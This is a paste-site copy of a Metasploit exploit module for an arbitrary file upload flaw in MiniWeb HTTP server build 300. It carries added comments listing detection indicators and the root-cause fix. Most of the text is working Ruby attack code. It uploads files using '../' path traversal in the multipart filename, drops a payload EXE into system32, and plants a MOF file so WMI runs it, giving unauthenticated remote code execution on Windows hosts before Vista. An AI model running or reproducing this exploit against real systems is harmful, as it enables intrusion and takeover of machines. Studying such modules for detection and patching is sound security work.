FeRR4L

MiniWeb (Build 300) Arbitrary File Upload (metasploit)

Aug 19th, 2013
  1. MiniWeb (Build 300) Arbitrary File Upload
  2. (metasploit)
  3.  
  4. ##
  5. # This file is part of the Metasploit Framework and may be subject to
  6. # redistribution and commercial restrictions. Please see the Metasploit
  7. # Framework web site for more information on licensing and terms of use.
  8. # http://metasploit.com/framework/
  9. ##
  10.  
  11. require 'msf/core'
  12.  
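  # Metasploit module for the arbitrary file upload flaw in the MiniWeb HTTP
  # server, build 300 (OSVDB 92198 and 92200, disclosed Apr 9 2013).
  #
  # What the code in this class does:
  # * +check+   - one GET for a random path, then a look at the +Server+ header.
  # * +upload+  - one multipart POST whose +filename+ field starts with a run of
  #               "../" segments, so the server writes outside its upload dir.
  # * +exploit+ - two uploads: an EXE into WINDOWS/system32 and a MOF into
  #               WINDOWS/system32/wbem/mof, then both are queued for cleanup.
  #
  # Notes for defenders and reviewers, derived from the code below:
  # * Network: unauthenticated multipart POSTs (default port 8000) where the
  #   Content-Disposition +filename+ contains "../" (10-19 repetitions with the
  #   default DEPTH) followed by a WINDOWS/system32 path.
  # * Host: a new .exe with a random 5-14 letter name in system32 and a .mof of
  #   the same base name under wbem\mof (later wbem\mof\good).
  # * Root cause is on the server side: the client-supplied upload filename is
  #   used as a path. A fix has to discard directory components from it, and the
  #   server process should not be able to write to system directories at all.
  #   The module sets 'Privileged' => true, which suggests it expects the
  #   resulting code to run with elevated rights - confirm against the target.
  class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    # Only hosts whose HTTP fingerprint mentions MiniWeb are considered.
    HttpFingerprint = { :pattern => [ /MiniWeb/ ] }

    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::EXE
    include Msf::Exploit::WbemExec
    include Msf::Exploit::FileDropper

    # Registers the module metadata and its options (RPORT, DEPTH).
    #
    # @param info [Hash] metadata passed in by the framework, merged with the
    #   values below through +update_info+
    def initialize(info = {})
      super(update_info(info,
        'Name'           => "MiniWeb (Build 300) Arbitrary File Upload",
        'Description'    => %q{
            This module exploits a vulnerability in MiniWeb HTTP server (build 300).
          The software contains a file upload vulnerability that allows an
          unauthenticated remote attacker to write arbitrary files to the file system.

            Code execution can be achieved by first uploading the payload to the remote
          machine as an exe file, and then upload another mof file, which enables
          WMI (Management Instrumentation service) to execute the uploaded payload.
          Please note that this module currently only works for Windows before Vista.
        },
        'License'        => MSF_LICENSE,
        'Author'         =>
          [
            'AkaStep',                             # Initial discovery
            'Brendan Coles <bcoles[at]gmail.com>', # Metasploit
          ],
        'References'     =>
          [
            ['OSVDB', '92198'],
            ['OSVDB', '92200'],
            ['URL',   'http://dl.packetstormsecurity.net/1304-exploits/miniweb-shelltraversal.txt']
          ],
        'Payload'        =>
          {
            'BadChars' => "\x00",
          },
        'Platform'       => 'win',
        'Targets'        =>
          [
            # Tested on MiniWeb build 300, built on Feb 28 2013
            # - Windows XP SP3 (EN)
            ['MiniWeb build 300 on Windows (Before Vista)', {}]
          ],
        'Privileged'     => true,
        'DisclosureDate' => "Apr 9 2013",
        'DefaultTarget'  => 0))

      register_options([
        Opt::RPORT(8000),
        # Number of "../" segments prepended to the upload filename;
        # upload() adds a random 0-9 on top of this value.
        OptInt.new('DEPTH', [true, 'Traversal depth', 10])
      ], self.class)
    end

    # @return [String] "host:port" of the target, used as a log prefix
    def peer
      "#{rhost}:#{rport}"
    end

    # Fingerprints the target by its +Server+ response header only; nothing is
    # uploaded. The result is therefore "Detected" at best, never "Vulnerable".
    #
    # @return [Exploit::CheckCode::Detected] the header is exactly "MiniWeb"
    # @return [Exploit::CheckCode::Unknown] no response, no +Server+ header, or
    #   a different server banner
    def check
      begin
        uri = normalize_uri(target_uri.path.to_s, rand_text_alpha(rand(10) + 5))
        res = send_request_cgi({
          'method' => 'GET',
          'uri'    => uri
        })
      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
        fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed")
      end

      # A response without a Server header yields nil here. The previous code
      # called .empty? on that nil and raised NoMethodError instead of
      # reporting Unknown; to_s makes the missing-header case explicit.
      server = res ? res.headers['Server'].to_s : ''
      return Exploit::CheckCode::Unknown if server.empty?
      return Exploit::CheckCode::Detected if server =~ /^MiniWeb$/

      Exploit::CheckCode::Unknown
    end

    # Sends one multipart/form-data POST carrying +filedata+ under a filename
    # that is prefixed with "../" segments.
    #
    # Request shape, as built below (useful when reading captures or writing
    # detections): random alphabetic URI path, a "----WebKitFormBoundary"
    # boundary with a 10-character random suffix, a single part named "file",
    # and a body that ends with a plain "--boundary" line rather than the
    # closing "--boundary--" delimiter. The code is unchanged from the original.
    #
    # @param filename [String] target path relative to the drive root
    # @param filedata [String] raw bytes to write
    # @return [Object, nil] whatever +send_request_cgi+ returns; the callers in
    #   this file do not inspect it
    def upload(filename, filedata)
      print_status("#{peer} - Trying to upload '#{::File.basename(filename)}'")
      uri   = normalize_uri(target_uri.path.to_s, "#{rand_text_alpha(rand(10)+5)}")
      depth = "../" * (datastore['DEPTH'] + rand(10))

      boundary   = "----WebKitFormBoundary#{rand_text_alphanumeric(10)}"
      post_data  = "--#{boundary}\r\n"
      post_data << "Content-Disposition: form-data; name=\"file\"; filename=\"#{depth}#{filename}\"\r\n"
      post_data << "Content-Type: application/octet-stream\r\n"
      post_data << "\r\n#{filedata}\r\n"
      post_data << "--#{boundary}\r\n"

      begin
        res = send_request_cgi({
          'method' => 'POST',
          'uri'    => uri,
          'ctype'  => "multipart/form-data; boundary=#{boundary}",
          'data'   => post_data
        })
      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
        fail_with(Exploit::Failure::Unreachable, "#{peer} - Connection failed")
      end

      return res
    end

    # Performs the two uploads described in the module description and queues
    # both files for removal. The upload responses are not checked, so a failed
    # write is not reported by this method.
    def exploit
      fname = "#{rand_text_alpha(rand(10)+5)}"

      # upload exe
      exe_name = "WINDOWS/system32/#{fname}.exe"
      exe = generate_payload_exe
      print_status("#{peer} - Sending executable (#{exe.length.to_s} bytes)")
      upload(exe_name, exe)

      # upload mof
      mof_name = "WINDOWS/system32/wbem/mof/#{fname}.mof"
      mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name))
      print_status("#{peer} - Sending MOF (#{mof.length.to_s} bytes)")
      upload(mof_name, mof)

      # list files to clean up
      # NOTE(review): the MOF is registered under wbem\mof\good, not the
      # directory it was uploaded to - presumably where WMI places a MOF after
      # processing it; confirm. Both paths are also where an incident responder
      # would look for leftovers if cleanup did not run.
      register_file_for_cleanup("#{::File.basename(exe_name)}")
      register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}")
    end
  end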